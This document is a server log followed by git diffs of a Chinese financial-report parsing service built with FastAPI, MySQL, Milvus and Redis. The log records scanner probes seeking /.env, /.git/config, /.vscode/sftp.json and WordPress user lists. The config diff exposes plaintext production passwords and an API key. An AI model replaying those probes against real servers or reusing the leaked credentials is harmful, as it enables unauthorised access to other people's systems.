File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 489, in send
output = self.conn.send(event=response)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 512, in send
data_list = self.send_with_data_passthrough(event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 537, in send_with_data_passthrough
self._process_event(self.our_role, event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 272, in _process_event
self._cstate.process_event(role, type(event), server_switch_event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 293, in process_event
self._fire_event_triggered_transitions(role, _event_type)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 311, in _fire_event_triggered_transitions
raise LocalProtocolError(
h11._util.LocalProtocolError: can't handle event type Response when role=SERVER and state=MUST_CLOSE
INFO: 138.197.191.87:39362 - "GET / HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49354 - "GET /server HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49358 - "GET /version HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49374 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49388 - "GET /about HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49394 - "GET /debug/default/view?panel=config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49404 - "GET /v2/_catalog HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49416 - "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49430 - "GET /server-status HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49442 - "GET /_all_dbs HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49446 - "GET /.DS_Store HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36216 - "GET /.env HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36226 - "GET /.git/config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36240 - "GET /s/330313e20363e24393e213/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36252 - "GET /config.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36262 - "GET /telescope/requests HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36272 - "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:44049 - "HEAD /config.json HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:35640 - "GET /config.json HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:31877 - "HEAD /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:18422 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 42.63.124.88:16626 - "GET / HTTP/1.1" 404 Not Found
INFO: 1.83.125.97:13483 - "GET / HTTP/1.1" 404 Not Found
INFO: 183.160.194.117:4463 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 45.207.223.44:53774 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53788 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53802 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53812 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53824 - "GET /login.rsp HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:51720 - "GET /nobody/favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:51724 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38120 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38128 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38138 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52270 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52280 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52286 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52296 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37634 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37636 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37638 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53680 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53686 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53692 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53696 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48892 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48900 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48904 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48914 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47014 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47016 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47026 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47034 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38420 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:56652 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:56662 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:42704 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 123.249.105.139:30528 - "HEAD /image/lgbg.jpg HTTP/1.1" 404 Not Found
INFO: 123.249.105.139:62486 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:27278 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:62601 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:25603 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:39062 - "GET / HTTP/1.1" 404 Not Found
INFO: 119.23.241.9:39090 - "GET / HTTP/1.1" 404 Not Found
INFO: 119.23.241.9:39118 - "GET /lang/CN.txt HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 172.169.4.170:54810 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:38808 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.194:53228 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.194:53238 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 173.230.135.6:49676 - "GET / HTTP/1.0" 404 Not Found
INFO: 135.148.63.215:40035 - "GET / HTTP/1.1" 404 Not Found
INFO: 51.81.181.175:37407 - "GET /favicon.ico HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.156.89:59349 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.88:55637 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.85:58053 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.87:5115 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 87.236.176.226:49403 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:54802 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.168:52085 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.178:24179 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.179:52289 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.169:64257 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.216.140.186:60346 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 167.94.138.34:46446 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.34:46456 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:37700 - "GET / HTTP/1.1" 404 Not Found
INFO: 134.209.10.97:46074 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 223.113.128.164:47694 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 70.39.75.167:49148 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.106:20829 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.107:28619 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.107:43499 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.97:12331 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48530 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48546 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48570 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48554 - "GET /robots.txt HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 124.70.57.132:34056 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.57.132:22282 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 39.105.169.144:41754 - "GET / HTTP/1.1" 404 Not Found
INFO: 39.105.169.144:43626 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:59862 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:33260 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:48986 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:49002 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:49010 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 13.64.109.8:36270 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 120.46.90.142:45574 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 120.46.90.142:23709 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 124.70.25.74:13545 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.25.74:28683 - "GET / HTTP/1.1" 404 Not Found
INFO: 124.70.25.74:28683 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 206.168.34.40:35806 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.40:35818 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.226.197.63:57255 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.226.197.63:34425 - "GET /console HTTP/1.1" 404 Not Found
INFO: 185.226.197.64:37409 - "GET /showLogin.cc HTTP/1.1" 404 Not Found
INFO: 87.236.176.94:57835 - "GET / HTTP/1.1" 404 Not Found
INFO: 18.144.4.34:39516 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:33568 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 106.75.188.200:37598 - "POST /token HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:34548 - "GET /aaa9 HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:34552 - "GET /aab8 HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:42104 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 89.248.172.41:56854 - "HEAD /playlist.m3u HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:13626 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15908 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15922 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15926 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 103.203.58.4:41010 - "GET / HTTP/1.1" 404 Not Found
INFO: 80.82.77.139:49396 - "GET / HTTP/1.1" 404 Not Found
INFO: 80.82.77.139:50230 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:40242 - "GET / HTTP/1.1" 404 Not Found
INFO: 70.39.75.159:34126 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:59652 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 206.168.34.220:36530 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.220:36552 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:25149 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:35249 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 34.140.231.8:38328 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 143.244.133.204:60510 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 36.111.151.242:59402 - "GET / HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58560 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58564 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58578 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 124.70.90.23:39065 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.156.111:30617 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.111:35591 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.118:17357 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.113:56373 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 123.160.223.74:33085 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.71.11.105:49012 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:36288 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 167.94.138.163:46744 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.163:46748 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 18.199.93.83:51354 - "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 172.169.6.55:42302 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:28842 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:37052 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:37082 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:9770 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 208.87.243.131:57870 - "GET http%3A//azenv.net/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:62210 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:13433 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 87.236.176.32:54413 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.172:16101 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.176:47069 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.170:61969 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.167:61305 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39188 - "GET /aaa9 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39204 - "GET /aab8 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39206 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 154.212.141.171:53736 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 118.26.39.17:57178 - "GET / HTTP/1.1" 404 Not Found
INFO: 118.26.39.17:57214 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 167.94.138.175:45612 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.175:45628 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 178.32.170.30:38143 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 45.83.65.202:56736 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.83.66.235:14182 - "GET /favicon.ico HTTP/1.1" 404 Not Found

View File

@ -3,7 +3,6 @@ from pydantic import BaseModel
import os
import utils
import queue
-import multiprocessing
from multiprocessing import Process
import word_title
import time
@ -85,7 +84,7 @@ def run_job():
p = Process(target=main_word.process_table, args=(file_id, job_info,))
processes.append(p)
p.start()
-applog.info(f'等待所有子任务完成任务ID:{file_id}')
+applog.info(f'等待所有子任务完成任务ID:{file_id}' )
for p in processes:
p.join()
@ -213,14 +212,14 @@ app.post("/parser/start",
# Run the FastAPI application
if __name__ == "__main__":
# Start the service on the server
-# import uvicorn
-#
-# uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+import uvicorn
+
+uvicorn.run(app, host="0.0.0.0", port=config.PORT)
# Local debug job
-file_id = "201917"
-job_queue.put({
-'file_path': '1.docx',
-'file_id': file_id,
-})
-db_service_word.delete_database(file_id)
-run_job()
+# file_id = "201837"
+# job_queue.put({
+# 'file_path': '西部建设.docx',
+# 'file_id': file_id,
+# })
+# db_service_word.delete_database(file_id)
+# run_job()
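run_job (second hunk above) fans each parsing job out to its own multiprocessing.Process and joins them all before reporting completion. The fork/join skeleton in isolation, as a generic sketch rather than code from this repo:

from multiprocessing import Process

def work(task_id):
    print(f"processing {task_id}")

if __name__ == "__main__":
    processes = [Process(target=work, args=(i,)) for i in range(4)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()  # block until every child has finished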

View File

@ -1,33 +1,23 @@
-MILVUS_CLIENT='http://124.70.129.232:19530'
+MILVUS_CLIENT='http://127.0.0.1:19530'
-#MILVUS_CLIENT='http://60.204.228.154:19530'
+MILVUS_HOST = '127.0.0.1'
-MYSQL_HOST = '121.37.185.246'
+MILVUS_PORT = 19530
MYSQL_HOST = '10.127.2.207'
MYSQL_PORT = 3306
-MYSQL_USER = 'financial'
+MYSQL_USER = 'financial_prod'
-MYSQL_PASSWORD = 'financial_8000'
+MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB = 'financial_report'
+MYSQL_DB = 'financial_report_prod'
NOTIFY_ADDR = 'http://10.127.2.202:8100/api/tenant/report/notify'
-# NOTIFY_ADDR = 'http://192.168.0.175:8100/api/tenant/report/notify'
+FILE_PATH = '/root/pdf_parser/word/'
REDIS_HOST = '10.127.2.209'
NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
# REDIS_HOST = '127.0.0.1'
REDIS_HOST = '123.60.153.169'
REDIS_PORT = 6379
-REDIS_PASSWORD = 'Xgf_redis'
+REDIS_PASSWORD = 'dMrt4kmwiW6LDJXy'
FILE_PATH = '/root/word_parser/word/'
PORT = 8001
MEASURE_COUNT = 8
# MYSQL_HOST_APP = '192.168.0.201'#192.168.0.201
# MYSQL_PORT_APP = 3306
# MYSQL_USER_APP = 'root'
# MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
# MYSQL_DB_APP = 'financial_report_prod'
MYSQL_HOST_APP = '10.127.2.207'
MYSQL_HOST_APP = '121.37.185.246'#192.168.0.201
MYSQL_PORT_APP = 3306
-MYSQL_USER_APP = 'financial'
+MYSQL_USER_APP = 'financial_prod'
-MYSQL_PASSWORD_APP = 'financial_8000'
+MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
-MYSQL_DB_APP = 'financial_report'
+MYSQL_DB_APP = 'financial_report_prod'
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
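These settings are imported at service startup. A minimal sketch of how the new Milvus and Redis values are typically consumed (illustrative only; db=6 matches the Redis database hard-coded in insert_measure_vector further below):

import redis
from pymilvus import connections

import config

connections.connect(host=config.MILVUS_HOST, port=config.MILVUS_PORT)
redis_client = redis.Redis(host=config.REDIS_HOST, port=config.REDIS_PORT,
                           password=config.REDIS_PASSWORD, db=6)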

View File

@ -154,9 +154,9 @@ if __name__ == "__main__":
)
cursor = conn.cursor()
-# measure_config_to_db(conn,cursor)
+measure_config_to_db(conn,cursor)
-insert_measure_vector(conn,cursor)
+# insert_measure_vector(conn,cursor)
# cursor.close()
# conn.close()

View File

@ -209,6 +209,17 @@ def update_ori_measure(conn,cursor,file_id):
and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year)
select_query_first_quarter = '''
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
FROM ori_measure_list t1
left join
measure_config_first_quarter t2
on t1.ori_measure_id = t2.ori_measure_id
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
and t1.file_id = '{file_id}'
and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year)
if report_type == 1:
start_time = time.time()
cursor.execute(select_query_half_year)
@ -216,6 +227,13 @@ def update_ori_measure(conn,cursor,file_id):
end_time = time.time()
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
applog.info(f'update_ori_measure方法走的是半年报')
elif report_type == 2:
start_time = time.time()
cursor.execute(select_query_first_quarter)
records = cursor.fetchall()
end_time = time.time()
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
applog.info(f'update_ori_measure方法走的是一季报')
elif report_type == 3:
start_time = time.time()
cursor.execute(select_query_thrid)
@ -243,6 +261,9 @@ def update_ori_measure(conn,cursor,file_id):
if report_type == 0:
table_name = "measure_config"
elif report_type == 2:
table_name = "measure_config_first_quarter"
elif report_type == 3:
table_name = "measure_config_third_quarter"
else:
@ -342,7 +363,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
measure_index_records = cursor_app.fetchall()
for measure_index_record in measure_index_records:
measure_index_array.append(measure_index_record[0])
if str(report_type) == "2":
table_index_array = []
measure_index_array = []
applog.info(f'黑名单的值是{parent_table_pages}和{table_index_array}以及新增的{measure_index_array}')
applog.info(f"black_array:{black_array}")
record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1]
@ -369,6 +397,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
filter=filter_str
)
# Convert the output to a formatted JSON string
# for i in range(len(res[0])):
for i in range(len(res[0])):
@ -392,11 +422,13 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
# Filter out measures whose names contain blacklist keywords
if utils.check_pdf_measure_black_list(pdf_measure):
continue
if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
applog.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
continue
if vector_distance > distance and table_num not in parent_table_pages:
# Rule checks start here
# Check whether the extracted measure and the report measure cover the same period
@ -407,6 +439,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
if(ori_period != pdf_period):
continue
# Check whether both are beginning-of-period measures
start_ori_period = utils.get_start_period_type(ori_measure_name)
start_pdf_period = utils.get_start_period_type(pdf_measure)
@ -423,12 +456,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
if(ori_season_type != pdf_season_type):
continue
# Check whether both are measures excluding non-recurring gains and losses
ori_kf_type = utils.get_kf_flag(ori_measure_name)
pdf_kf_type = utils.get_kf_flag(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计':
applog.info(f'第4处的{ori_kf_type}和{pdf_kf_type}')
if(ori_kf_type != pdf_kf_type):
applog.info(f'扣非指标{table_num}页的{pdf_measure}指标')
continue
# Check whether the two measures have the same type, i.e. whether both are percentages
@ -465,6 +500,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
continue
if(utils.check_white_list(measure_name,pdf_measure)):
applog.info(f"measure_name{measure_name},pdf_measure{pdf_measure}")
continue
# Check whether both measures are growth-type, e.g. year-on-year change counts as growth
@ -508,6 +544,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
conn.close()
client.close()
#
def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name):
select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
cursor.execute(select_year_select)
@ -527,10 +564,16 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter
where year = '{year}'
'''.format(year=report_year)
select_query_first_quarter = '''
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
where year = '{year}'
'''.format(year=report_year)
# select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0'
select_black_array_query = '''
SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and find_in_set('{year}',year) and find_in_set('{flag}',flag)
'''.format(year=report_year, flag=report_type)
black_array = []
cursor.execute(select_black_array_query)
results = cursor.fetchall()
@ -553,6 +596,20 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
processes.append(p)
p.start()
elif report_type == 2:
start_time = time.time()
cursor.execute(select_query_first_quarter)
records = cursor.fetchall()
end_time = time.time()
applog.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
applog.info('insert_table_measure_from_vector_async_process方法走的一季报')
start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = []
for record_range in records_range_parts:
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
processes.append(p)
p.start()
elif report_type == 3:
start_time = time.time()
cursor.execute(select_query_thrid)
@ -698,11 +755,15 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
measure_list = table['measure_list']
for measure in measure_list:
measure_name = measure['measure_name']
# Measures that should be skipped
black_list = ["营业总成本"]
if any(black in measure_name for black in black_list):
continue
measure_value = measure['measure_value'].replace("(", "").replace(")", "")
measure_name = utils.get_clean_text(measure_name)
-measure_name = measure_name.replace('2024','2024年').replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')  # absurdly, these just won't delete
+measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')  # absurdly, these just won't delete
#measure_name_1 = measure_name.replace('调整后','')
-quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2024年','2023年','2022年','2021年','']
+quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2023年','2022年','2021年','']
for quarter in quarters:
measure_name = measure_name.replace(quarter * 2, quarter)
pattern_dup = re.compile(r'(\w{3,})\1+')  # strip any repeated run longer than two characters
@ -712,7 +773,6 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
measure_name = pattern_dup.sub(r'\1', measure_name)
measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
measure_unit = measure['measure_unit']
if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
vector_obj = utils.embed_with_str(measure_name_1)
vector = vector_obj.output["embeddings"][0]["embedding"]
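The pattern_dup regex above collapses any immediately repeated run of three or more word characters, which is how doubled text from merged table cells gets cleaned. A quick worked example:

import re

pattern_dup = re.compile(r'(\w{3,})\1+')
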